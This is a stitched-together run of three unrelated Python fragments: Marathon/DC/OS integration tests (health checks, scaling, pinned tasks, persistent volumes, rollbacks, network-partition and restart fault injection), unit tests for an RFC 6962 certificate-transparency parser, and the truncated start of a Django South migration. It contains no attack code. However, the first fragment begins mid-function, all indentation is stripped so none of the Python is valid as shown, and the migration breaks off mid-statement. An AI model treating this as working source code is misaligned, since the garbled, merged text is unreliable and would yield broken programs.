groups_id = group_def["groups"][0]["id"]
app1_id = group_def["groups"][0]["apps"][0]["id"]
app2_id = group_def["groups"][0]["apps"][1]["id"]
client = marathon.create_client()
client.create_group(group_def)
deployment_wait(service_id=app1_id)
group_apps = client.get_group(groups_id)
apps = group_apps['apps']
assert len(apps) == 2, "The number of apps is {}, but 2 was expected".format(len(apps))
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 1, "The number of tasks #1 is {} after deployment, but 1 was expected".format(len(tasks1))
assert len(tasks2) == 1, "The number of tasks #2 is {} after deployment, but 1 was expected".format(len(tasks2))
# scaling just one app in the group
client.scale_app(app1_id, 2)
deployment_wait(service_id=app1_id)
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 2, "The number of tasks #1 is {} after scale, but 2 was expected".format(len(tasks1))
assert len(tasks2) == 1, "The number of tasks #2 is {} after scale, but 1 was expected".format(len(tasks2))
deployment_wait(service_id=app1_id)
# scaling the group after one app in the group was scaled
client.scale_group(groups_id, 2)
deployment_wait(service_id=app1_id)
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 4, "The number of tasks #1 is {} after scale, but 4 was expected".format(len(tasks1))
assert len(tasks2) == 2, "The number of tasks #2 is {} after scale, but 2 was expected".format(len(tasks2))
def assert_app_healthy(client, app_def, health_check):
app_def['healthChecks'] = [health_check]
instances = app_def['instances']
app_id = app_def["id"]
logger.info('Testing {} health check protocol.'.format(health_check['protocol']))
client.add_app(app_def)
deployment_wait(service_id=app_id, max_attempts=300)
app = client.get_app(app_id)
assert app['tasksRunning'] == instances, \
"The number of running tasks is {}, but {} was expected".format(app['tasksRunning'], instances)
assert app['tasksHealthy'] == instances, \
"The number of healthy tasks is {}, but {} was expected".format(app['tasksHealthy'], instances)
@dcos_1_9
@pytest.mark.parametrize('protocol', ['HTTP', 'MESOS_HTTP', 'TCP', 'MESOS_TCP'])
def test_http_health_check_healthy(protocol):
"""Tests HTTP, MESOS_HTTP, TCP and MESOS_TCP health checks against a web-server in Python."""
app_def = apps.http_server()
client = marathon.create_client()
assert_app_healthy(client, app_def, common.health_check(protocol=protocol))
def test_app_with_no_health_check_not_healthy():
"""Makes sure that no task is marked as healthy if no health check is defined for the corresponding app."""
app_def = apps.sleep_app()
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
app = client.get_app(app_id)
assert app['tasksRunning'] == 1, \
"The number of running tasks is {}, but 1 was expected".format(app['tasksRunning'])
assert app['tasksHealthy'] == 0, \
"The number of healthy tasks is {}, but 0 was expected".format(app['tasksHealthy'])
def test_command_health_check_healthy():
"""Tests COMMAND health check"""
app_def = apps.sleep_app()
client = marathon.create_client()
assert_app_healthy(client, app_def, common.command_health_check())
@dcos_1_9
@pytest.mark.parametrize('protocol', ['HTTPS', 'MESOS_HTTPS'])
def test_https_health_check_healthy(protocol):
"""Tests HTTPS and MESOS_HTTPS health checks using a prepared nginx image that enables
SSL (using self-signed certificate) and listens on 443.
"""
# marathon version captured here will work for root and mom
requires_marathon_version('1.4.2')
client = marathon.create_client()
app_def = apps.docker_nginx_ssl()
assert_app_healthy(client, app_def, common.health_check(protocol=protocol, port_index=1))
@dcos_1_12
def test_https_readiness_check_ready():
"""Tests HTTPS readiness check using a prepared nginx image that enables
SSL (using self-signed certificate) and listens on 443.
"""
client = marathon.create_client()
app_def = apps.app_with_https_readiness_checks()
app_id = app_def["id"]
client.add_app(app_def)
# when readiness check keeps failing, the deployment will never finish
deployment_wait(service_id=app_id, max_attempts=300)
def test_failing_health_check_results_in_unhealthy_app():
"""Tests failed health checks of an app. The health check is meant to never pass."""
app_def = apps.http_server()
app_def['healthChecks'] = [common.health_check('/bad-url', 'HTTP', failures=0, timeout=3)]
client = marathon.create_client()
client.add_app(app_def)
assert_that(lambda: client.get_app(app_def["id"]), eventually(
has_values(tasksRunning=1, tasksHealthy=0, tasksUnhealthy=1), max_attempts=30))
@private_agents(2)
def test_task_gets_restarted_due_to_network_split():
"""Verifies that a health check fails in presence of a network partition."""
app_def = apps.http_server("app-network-split")
app_id = app_def["id"]
app_def['healthChecks'] = [common.health_check()]
common.pin_to_host(app_def, common.ip_other_than_mom())
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
app = client.get_app(app_id)
assert app['tasksRunning'] == 1, \
"The number of running tasks is {}, but 1 was expected".format(app['tasksRunning'])
assert app['tasksHealthy'] == 1, \
"The number of healthy tasks is {}, but 1 was expected".format(app['tasksHealthy'])
tasks = client.get_tasks(app_id)
task_id = tasks[0]['id']
host = tasks[0]['host']
port = tasks[0]['ports'][0]
# introduce a network partition
common.block_iptable_rules_for_seconds(host, port, sleep_seconds=10, block_input=True, block_output=False)
# Network partition should cause the task to restart N times until the partition is resolved (since we
# pinned the task to the split agent). A new task with a new taskId should eventually be running and healthy.
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_health_message():
tasks = client.get_tasks(app_id)
new_task_id = tasks[0]['id']
assert task_id != new_task_id, "The task has not been restarted: {}".format(task_id)
app = client.get_app(app_id)
assert app['tasksRunning'] == 1, \
"The number of running tasks is {}, but 1 was expected".format(app['tasksRunning'])
assert app['tasksHealthy'] == 1, \
"The number of healthy tasks is {}, but 1 was expected".format(app['tasksHealthy'])
check_health_message()
def test_health_check_works_with_resident_task():
"""Verifies that resident tasks (common for Persistent Volumes) do not fail health checks.
Marathon bug: https://jira.mesosphere.com/browse/MARATHON-7050
"""
app_def = apps.resident_docker_app()
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id, max_attempts=500)
tasks = client.get_tasks(app_def["id"])
assert len(tasks) == 1, "The number of tasks is {}, but 1 was expected".format(len(tasks))
assert_that(lambda: client.get_app(app_def['id']), eventually(has_value('tasksHealthy', 1), max_attempts=30))
@private_agents(2)
def test_pinned_task_scales_on_host_only():
"""Tests that a pinned app scales only on the pinned node."""
app_def = apps.sleep_app()
app_id = app_def["id"]
host = common.ip_other_than_mom()
common.pin_to_host(app_def, host)
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but 1 was expected".format(len(tasks))
assert tasks[0]['host'] == host, \
"The task is on {}, but it is supposed to be on {}".format(tasks[0]['host'], host)
client.scale_app(app_id, 10)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert len(tasks) == 10, "The number of tasks is {} after scale, but 10 was expected".format(len(tasks))
for task in tasks:
assert task['host'] == host, "The task is on {}, but it is supposed to be on {}".format(task['host'], host)
@private_agents(2)
def test_pinned_task_recovers_on_host():
"""Tests that when a pinned task gets killed, it recovers on the node it was pinned to."""
app_def = apps.sleep_app()
app_id = app_def["id"]
host = common.ip_other_than_mom()
common.pin_to_host(app_def, host)
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
common.kill_process_on_host(host, '[s]leep')
deployment_wait(service_id=app_id)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_for_new_task():
new_tasks = client.get_tasks(app_id)
assert tasks[0]['id'] != new_tasks[0]['id'], "The task did not get killed: {}".format(tasks[0]['id'])
assert new_tasks[0]['host'] == host, \
"The task got restarted on {}, but it was supposed to stay on {}".format(new_tasks[0]['host'], host)
check_for_new_task()
@private_agents(2)
def test_pinned_task_does_not_scale_to_unpinned_host():
"""Tests when a task lands on a pinned node (and barely fits) and it is asked to scale past
the resources of that node, no tasks will be launched on any other node.
"""
app_def = apps.sleep_app()
app_id = app_def['id']
host = common.ip_other_than_mom()
logger.info('Constraint set to host: {}'.format(host))
# the size of cpus is designed to be greater than 1/2 of a node
# such that only 1 task can land on the node.
cores = common.cpus_on_agent(host)
app_def['cpus'] = max(0.6, cores - 0.5)
common.pin_to_host(app_def, host)
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
client.scale_app(app_id, 2)
time.sleep(5)
deployments = client.get_deployments(app_id=app_id)
tasks = client.get_tasks(app_id)
# still deploying
assert len(deployments) == 1, "The number of deployments is {}, but 1 was expected".format(len(deployments))
assert len(tasks) == 1, "The number of tasks is {}, but 1 was expected".format(len(tasks))
@private_agents(2)
def test_pinned_task_does_not_find_unknown_host():
"""Tests that a task pinned to an unknown host will not launch.
Within 10 secs it should still be in deployment and 0 tasks should be running.
"""
app_def = apps.sleep_app()
common.pin_to_host(app_def, '10.255.255.254')
client = marathon.create_client()
client.add_app(app_def)
# apps deploy within secs
# assuming that after 10 no tasks meets criteria
time.sleep(10)
tasks = client.get_tasks(app_def["id"])
assert len(tasks) == 0, "The number of tasks is {}, 0 was expected".format(len(tasks))
@dcos_1_8
def test_restart_container_with_persistent_volume():
"""A task with a persistent volume, which writes to a file in the persistent volume, is launched.
The app is killed and restarted and we can still read from the persistent volume what was written to it.
"""
app_def = apps.persistent_volume_app()
app_id = app_def['id']
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but 1 was expected".format(len(tasks))
host = tasks[0]['host']
port = tasks[0]['ports'][0]
cmd = "curl {}:{}/data/foo".format(host, port)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_task(cmd, target_data):
run, data = run_command_on_master(cmd)
assert run, "{} did not succeed".format(cmd)
assert data == target_data, "'{}' was not equal to {}".format(data, target_data)
check_task(cmd, target_data='hello\n')
client.restart_app(app_id)
deployment_wait(service_id=app_id)
assert_that(lambda: client.get_tasks(app_id), eventually(has_len(equal_to(1)), max_attempts=30))
host = tasks[0]['host']
port = tasks[0]['ports'][0]
cmd = "curl {}:{}/data/foo".format(host, port)
check_task(cmd, target_data='hello\nhello\n')
@dcos_1_8
def test_app_with_persistent_volume_recovers():
"""Tests that when an app task with a persistent volume gets killed,
it recovers on the node it was launched on, and it gets attached
to the same persistent-volume."""
app_def = apps.persistent_volume_app()
app_id = app_def['id']
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but 1 was expected".format(len(tasks))
task_id = tasks[0]['id']
port = tasks[0]['ports'][0]
host = tasks[0]['host']
cmd = "curl {}:{}/data/foo".format(host, port)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_task(cmd, target_data):
run, data = run_command_on_master(cmd)
assert run, "{} did not succeed".format(cmd)
assert target_data in data, "'{}' not found in {}".format(target_data, data)
check_task(cmd, target_data='hello\n')
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def kill_task(host, pattern):
pids = common.kill_process_on_host(host, pattern)
assert len(pids) != 0, "no task got killed on {} for pattern {}".format(host, pattern)
kill_task(host, '[h]ttp\\.server')
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_task_recovery():
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after recovery, but 1 was expected".format(len(tasks))
new_task_id = tasks[0]['id']
assert task_id != new_task_id, "The task ID has not changed, and is still {}".format(task_id)
check_task_recovery()
port = tasks[0]['ports'][0]
host = tasks[0]['host']
cmd = "curl {}:{}/data/foo".format(host, port)
check_task(cmd, target_data='hello\nhello\n')
def test_app_update():
"""Tests that an app gets successfully updated."""
app_def = apps.mesos_app(app_id='/update-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but 1 was expected".format(len(tasks))
app_def['cpus'] = 1
app_def['instances'] = 2
client.update_app(app_id, app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert len(tasks) == 2, "The number of tasks is {} after deployment, but 2 was expected".format(len(tasks))
def test_app_update_rollback():
"""Tests that an updated app can be rolled back to its initial version."""
app_def = apps.readiness_and_health_app("app-update-rollback")
app_id = app_def["id"]
# First deployment
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert_that(tasks, has_len(equal_to(1)))
# Second deployment
app_def['instances'] = 2
client.update_app(app_id, app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert_that(tasks, has_len(equal_to(2)))
# Third deployment with rollback
# provides a testing delay to rollback in the meantime
app_def['readinessChecks'][0]['intervalSeconds'] = 30
app_def['instances'] = 1
deployment_id = client.update_app(app_id, app_def)
client.rollback_deployment(deployment_id)
deployment_wait(service_id=app_id)
# update to 1 instance is rollback to 2
tasks = client.get_tasks(app_id)
assert_that(tasks, has_len(equal_to(2)))
def test_unhealthy_app_can_be_rolled_back():
"""Verifies that an updated app gets rolled back due to being unhealthy."""
app_def = apps.readiness_and_health_app()
app_id = app_def["id"]
@retrying.retry(
wait_fixed=1000,
stop_max_attempt_number=30,
retry_on_exception=common.ignore_provided_exception(DCOSException)
)
def wait_for_deployment():
deployment_wait(service_id=app_id)
client = marathon.create_client()
client.add_app(app_def)
wait_for_deployment()
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but 1 was expected".format(len(tasks))
app_def['healthChecks'][0]['path'] = '/non-existent'
app_def['instances'] = 2
deployment_id = client.update_app(app_id, app_def)
try:
wait_for_deployment()
except Exception:
client.rollback_deployment(deployment_id)
wait_for_deployment()
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after rollback, but 1 was expected".format(len(tasks))
@private_agents(2)
def test_marathon_with_master_process_failure(marathon_service_name):
"""Launches an app and restarts the master. It is expected that the service endpoint eventually comes back and
the task ID stays the same.
"""
app_def = apps.sleep_app()
app_id = app_def["id"]
host = common.ip_other_than_mom()
common.pin_to_host(app_def, host)
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
original_task_id = tasks[0]['id']
common.systemctl_master('restart')
shakedown.dcos.service.wait_for_service_endpoint(marathon_service_name, path="ping")
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_task_recovery():
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after master restart, but 1 was expected".format(len(tasks))
assert tasks[0]['id'] == original_task_id, \
"Task {} has not recovered, it got replaced with another one: {}".format(original_task_id, tasks[0]['id'])
check_task_recovery()
@private_agents(2)
def test_marathon_when_disconnected_from_zk():
"""Launches an app from Marathon, then knocks out access to ZK from Marathon.
Verifies the task is preserved.
"""
app_def = apps.sleep_app()
app_id = app_def["id"]
host = common.ip_other_than_mom()
common.pin_to_host(app_def, host)
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
original_task_id = tasks[0]['id']
common.block_iptable_rules_for_seconds(host, 2181, sleep_seconds=10, block_input=True, block_output=False)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_task_is_back():
tasks = client.get_tasks(app_id)
assert tasks[0]['id'] == original_task_id, \
"The task {} got replaced with {}".format(original_task_id, tasks[0]['id'])
check_task_is_back()
@private_agents(2)
def test_marathon_when_task_agent_bounced():
"""Launch an app and restart the node the task is running on."""
app_def = apps.sleep_app()
app_id = app_def["id"]
host = common.ip_other_than_mom()
common.pin_to_host(app_def, host)
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
original_task_id = tasks[0]['id']
restart_agent(host)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_task_is_back():
tasks = client.get_tasks(app_id)
assert tasks[0]['id'] == original_task_id, \
"The task {} got replaced with {}".format(original_task_id, tasks[0]['id'])
check_task_is_back()
def test_default_user():
"""Ensures a task is started as root by default."""
app_def = apps.sleep_app()
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
app = client.get_app(app_id)
user = app.get('user')
assert user is None, "User is {}, but it should not have been set".format(user)
tasks = client.get_tasks(app_id)
host = tasks[0]['host']
success = run_command_on_agent(host, "ps aux | grep '[s]leep ' | awk '{if ($1 !=\"root\") exit 1;}'")
assert success, "The app is running as non-root"
@common.marathon_1_4
def test_declined_offer_due_to_resource_role():
"""Tests that an offer gets declined because no resources are allocated for the role.
In the multi role world Marathon does not accept an `acceptedResourceRole` which is not also
the app `role` (it doesn't make sense, since the app will never start).
In oder to use an acceptedResourceRoles: ["very-random-role"] we need to deploy the app
in a top-level group with the same name ("very-random-role") and since enforceRole is by
default false, we also set the role field explicitly (to the same value).
"""
app_def = apps.sleep_app(app_id="/very-random-role/sleep-that-doesnt-start-because-no-resources")
app_def["role"] = "very-random-role"
app_def["acceptedResourceRoles"] = ["very-random-role"]
_test_declined_offer(app_def, 'UnfulfilledRole')
@common.marathon_1_4
def test_declined_offer_due_to_cpu_requirements():
"""Tests that an offer gets declined because the number of CPUs can't be found in an offer."""
app_def = apps.sleep_app()
app_def["cpus"] = 12345
_test_declined_offer(app_def, 'InsufficientCpus')
def _test_declined_offer(app_def, reason):
"""Used to confirm that offers were declined. The `processedOffersSummary` and these tests
in general require 1.4+ marathon with the queue end point.
The retry is the best possible way to "time" the success of the test.
"""
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def verify_declined_offer():
deployments = client.get_deployments(app_id)
assert len(deployments) == 1
offer_summary = client.get_queued_app(app_id)['processedOffersSummary']
role_summary = declined_offer_by_reason(offer_summary['rejectSummaryLastOffers'], reason)
last_attempt = declined_offer_by_reason(offer_summary['rejectSummaryLaunchAttempt'], reason)
assert role_summary['declined'] > 0, "There are no declined offers because of {}".format(reason)
assert role_summary['processed'] > 0, "There are no processed offers for {}".format(reason)
assert last_attempt['declined'] > 0, "There are no declined offers because of {}".format(reason)
assert last_attempt['processed'] > 0, "There are no processed offers for {}".format(reason)
verify_declined_offer()
def declined_offer_by_reason(offers, reason):
for offer in offers:
if offer['reason'] == reason:
del offer['reason']
return offer
return None
@pytest.mark.skipif("common.docker_env_not_set()")
def test_private_repository_docker_app():
username = os.environ['DOCKER_HUB_USERNAME']
password = os.environ['DOCKER_HUB_PASSWORD']
agents = get_private_agents()
common.create_docker_credentials_file(username, password)
common.copy_docker_credentials_file(agents)
app_def = apps.private_docker_app()
app_id = app_def["id"]
if ee_version() == 'strict':
app_def['user'] = 'root'
common.add_dcos_marathon_user_acls()
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
common.assert_app_tasks_running(client, app_def)
def test_ping(marathon_service_name):
"""Tests the Marathon's /ping end-point."""
response = common.http_get_marathon_path('ping', marathon_service_name)
assert response.status_code == 200, "HTTP status code {} is NOT 200".format(response.status_code)
assert 'pong' in response.text, "Got {} instead of pong".format(response.text)
def test_metrics_endpoint(marathon_service_name):
service_url = dcos_service_url(marathon_service_name)
auth = DCOSAcsAuth(dcos_acs_token())
response = requests.get("{}metrics".format(service_url), auth=auth, verify=verify_ssl())
assert response.status_code == 200, "HTTP status code {} is NOT 200".format(response.status_code)
if marathon_version_less_than('1.7'):
metric_name = 'service.mesosphere.marathon.app.count'
else:
metric_name = 'marathon.apps.active.gauge'
response_json = response.json()
logger.info('Found metric gauges: {}'.format(response_json['gauges']))
assert response_json['gauges'][metric_name] is not None, \
"{} is absent".format(metric_name)
def test_healtchcheck_and_volume():
"""Launches a Docker container on Marathon."""
app_def = apps.healthcheck_and_volume()
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
app = client.get_app(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but only 1 was expected".format(len(tasks))
assert len(app['container']['volumes']) == 2, "The container does not have the correct amount of volumes"
# check if app becomes healthy
assert_that(lambda: client.get_app(app_id), eventually(has_value('tasksHealthy', 1), max_attempts=30))
@dcos_1_9
def test_vip_mesos_cmd(marathon_service_name):
"""Validates the creation of an app with a VIP label and the accessibility of the service via the VIP."""
app_def = apps.http_server()
app_id = app_def["id"]
vip_name = app_id.lstrip("/")
fqn = '{}.{}.l4lb.thisdcos.directory'.format(vip_name, marathon_service_name)
app_def['portDefinitions'] = [{
"port": 0,
"protocol": "tcp",
"name": "{}".format(vip_name),
"labels": {
"VIP_0": "/{}:10000".format(vip_name)
}
}]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def http_output_check():
time.sleep(1)
common.assert_http_code('{}:{}'.format(fqn, 10000))
http_output_check()
@dcos_1_9
def test_vip_docker_bridge_mode(marathon_service_name):
"""Tests the creation of a VIP from a python command in a docker image using bridge mode.
the test validates the creation of an app with the VIP label and the accessability
of the service via the VIP.
"""
app_def = apps.docker_http_server(app_id='vip-docker-bridge-mode-app')
app_id = app_def["id"]
vip_name = app_id.lstrip("/")
fqn = '{}.{}.l4lb.thisdcos.directory'.format(vip_name, marathon_service_name)
app_def['id'] = vip_name
app_def['container']['docker']['portMappings'] = [{
"containerPort": 8080,
"hostPort": 0,
"labels": {
"VIP_0": "/{}:10000".format(vip_name)
},
"protocol": "tcp",
"name": "{}".format(vip_name)
}]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def http_output_check():
time.sleep(1)
common.assert_http_code('{}:{}'.format(fqn, 10000))
http_output_check()
def requires_marathon_version(version):
"""This python module is for testing root and MoM marathons. The @marathon_1_5
annotation works only for the root marathon. The context switching necessary
for switching the marathons occurs after the evaluation of the pytestmark.
This function is used to ensure the correct version of marathon regardless
of root or mom.
"""
# marathon version captured here will work for root and mom
if marathon_version_less_than(version):
pytest.skip()
@pytest.mark.parametrize("test_type, get_pinger_app, dns_format", [
('localhost', apps.pinger_localhost_app, '{}.{}.mesos'),
('bridge', apps.pinger_bridge_app, '{}.{}.mesos'),
('container', apps.pinger_container_app, '{}.{}.containerip.dcos.thisdcos.directory'),
])
@dcos_1_9
@private_agents(2)
def test_network_pinger(test_type, get_pinger_app, dns_format, marathon_service_name):
"""This test runs a pinger app and a relay app. It retrieves the python app from the
master via the new http service (which will be moving into shakedown). Then a curl call
to the relay will invoke a call to the 2nd pinger app and return back pong to the relay
then back to curl.
It tests that 1 task can network communicate to another task on the given network
It tests inbound and outbound connectivity
test_type param is not used. It is passed so that it is clear which parametrized test
is running or may be failing.
"""
pinger_app = get_pinger_app()
relay_app = get_pinger_app()
relay_app["id"] = relay_app["id"].replace("pinger", "relay")
pinger_dns = dns_format.format(pinger_app["id"].lstrip("/"), marathon_service_name)
relay_dns = dns_format.format(relay_app["id"].lstrip("/"), marathon_service_name)
# test pinger app to master
copy_file_to_master(os.path.join(scripts.scripts_dir(), "pinger.py"))
client = marathon.create_client()
with master_http_service():
# need to add app with http service in place or it will fail to fetch
client.add_app(pinger_app)
client.add_app(relay_app)
deployment_wait(service_id=pinger_app["id"])
deployment_wait(service_id=relay_app["id"])
wait_for_dns(relay_dns)
relay_url = 'http://{}:7777/relay-ping?url={}:7777'.format(relay_dns, pinger_dns)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=300, retry_on_exception=common.ignore_exception)
def http_output_check():
status, output = run_command_on_master('curl {}'.format(relay_url))
assert status, "curl {} failed on master with {}".format(relay_url, output)
assert 'Pong {}'.format(pinger_app["id"]) in output
assert 'Relay from {}'.format(relay_app["id"]) in output
http_output_check()
@dcos_1_11
def test_ipv6_healthcheck(docker_ipv6_network_fixture):
""" There is new feature in DC/OS 1.11 that allows containers running on IPv6 network to be healthchecked from
Marathon. This tests verifies executing such healthcheck.
"""
app_def = apps.ipv6_healthcheck()
app_id = app_def["id"]
client = marathon.create_client()
target_instances_count = app_def['instances']
client.add_app(app_def)
deployment_wait(service_id=app_id)
app = client.get_app(app_id)
assert app['tasksRunning'] == target_instances_count, \
"The number of running tasks is {}, but {} was expected".format(app['tasksRunning'], target_instances_count)
assert app['tasksHealthy'] == target_instances_count, \
"The number of healthy tasks is {}, but {} was expected".format(app['tasksHealthy'], target_instances_count)
client.remove_app(app['id'], True)
|
|
from ctutlz import rfc6962
def test_parse_log_entry_type_0():
tdf = b'\x00\x00'
parse, offset = rfc6962._parse_log_entry_type(tdf)
assert offset == 2
assert parse == {
'tdf': b'\x00\x00',
'val': 0,
}
def test_parse_log_entry_type_1():
tdf = b'\x00\x01'
parse, offset = rfc6962._parse_log_entry_type(tdf)
assert offset == 2
assert parse == {
'tdf': b'\x00\x01',
'val': 1,
}
def test_log_entry_type_0_from_tdf():
tdf = b'\x00\x00anything'
log_entry_type = rfc6962.LogEntryType(arg=tdf)
assert log_entry_type.is_x509_entry is True
assert log_entry_type.is_precert_entry is False
assert log_entry_type.tdf == b'\x00\x00'
assert str(log_entry_type) == 'x509_entry'
assert log_entry_type._parse == {
'tdf': b'\x00\x00',
'val': 0,
}
def test_log_entry_type_0_from_parse():
parse = {
'tdf': b'\x00\x00',
'val': 0,
}
log_entry_type = rfc6962.LogEntryType(arg=parse)
assert log_entry_type.is_x509_entry is True
assert log_entry_type.is_precert_entry is False
assert log_entry_type.tdf == b'\x00\x00'
assert str(log_entry_type) == 'x509_entry'
assert log_entry_type._parse == {
'tdf': b'\x00\x00',
'val': 0,
}
def test_log_entry_type_1_from_tdf():
tdf = b'\x00\x01'
log_entry_type = rfc6962.LogEntryType(arg=tdf)
assert log_entry_type.is_x509_entry is False
assert log_entry_type.is_precert_entry is True
assert log_entry_type.tdf == b'\x00\x01'
assert str(log_entry_type) == 'precert_entry'
assert log_entry_type._parse == {
'tdf': b'\x00\x01',
'val': 1,
}
def test_log_entry_type_1_from_parse():
parse = {
'tdf': b'\x00\x01',
'val': 1,
}
log_entry_type = rfc6962.LogEntryType(arg=parse)
assert log_entry_type.is_x509_entry is False
assert log_entry_type.is_precert_entry is True
assert log_entry_type.tdf == b'\x00\x01'
assert str(log_entry_type) == 'precert_entry'
assert log_entry_type._parse == {
'tdf': b'\x00\x01',
'val': 1,
}
def test_signature_type_0_from_tdf():
tdf = b'\x00\x01\x02\x03\x04\x05\x06\x07\x89'
signature_type = rfc6962.SignatureType(arg=tdf)
assert signature_type.is_certificate_timestamp is True
assert signature_type.is_tree_hash is False
assert signature_type._parse == {
'tdf': b'\x00',
'val': 0,
}
def test_signature_type_0_from_parse():
parse = {
'tdf': b'\x00',
'val': 0,
}
signature_type = rfc6962.SignatureType(arg=parse)
assert signature_type.is_certificate_timestamp is True
assert signature_type.is_tree_hash is False
assert signature_type._parse == {
'tdf': b'\x00',
'val': 0,
}
def test_signature_type_1_from_tdf():
tdf = b'\x01'
signature_type = rfc6962.SignatureType(arg=tdf)
assert signature_type.is_certificate_timestamp is False
assert signature_type.is_tree_hash is True
assert signature_type._parse == {
'tdf': b'\x01',
'val': 1,
}
def test_signature_type_1_from_parse():
parse = {
'tdf': b'\x01',
'val': 1,
}
signature_type = rfc6962.SignatureType(arg=parse)
assert signature_type.is_certificate_timestamp is False
assert signature_type.is_tree_hash is True
assert signature_type._parse == {
'tdf': b'\x01',
'val': 1,
}
def test_version_from_tdf():
tdf = b'\x00anything'
version = rfc6962.Version(tdf)
assert version.is_v1 is True
assert version._parse == {
'tdf': b'\x00',
'val': 0,
}
# invalid version number
invalid_tdf = b'\x10'
version = rfc6962.Version(invalid_tdf)
assert version.is_v1 is False
assert version._parse == {
'tdf': b'\x10',
'val': 16,
}
def test_version_from_parse():
parse = {
'val': 0,
'tdf': b'\x00',
}
version = rfc6962.Version(arg=parse)
assert version.is_v1 is True
assert version._parse == {
'tdf': b'\x00',
'val': 0,
}
def test_SignedCertificateTimestamp_from_tdf():
tdf = (b'\x00\xeeK\xbd\xb7u\xce`\xba\xe1Bi\x1f\xab\xe1\x9ef\xa3\x0f~_\xb0r'
b'\xd8\x83\x00\xc4{\x89z\xa8\xfd\xcb\x00\x00\x01]\xe7\x11\xf5\xf7'
b'\x00\x00\x04\x03\x00F0D\x02 ph\xa0\x08\x96H\xbc\x1b\x11\x0e\xd0'
b'\x98\x02\xa8\xac\xb8\x19-|,\xe5\x0e\x9e\xf8/_&\xf7b\x88\xb4U\x02 X'
b'\xbc\r>jFN\x0e\xda\x0b\x1b\xb5\xc0\x1a\xfd\x90\x91\xb0&\x1b\xdf'
b'\xdc\x02Z\xd4zd\xd7\x80c\x0f\xd5')
sct = rfc6962.SignedCertificateTimestamp(arg=tdf)
assert sct.log_id.tdf == (b'\xeeK\xbd\xb7u\xce`\xba\xe1Bi\x1f\xab\xe1\x9ef'
b'\xa3\x0f~_\xb0r\xd8\x83\x00\xc4{\x89z\xa8\xfd'
b'\xcb')
assert sct.tdf == tdf
|
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'IdMapping'
db.create_table(u'ddsc_core_idmapping', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('timeseries', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['ddsc_core.Timeseries'])),
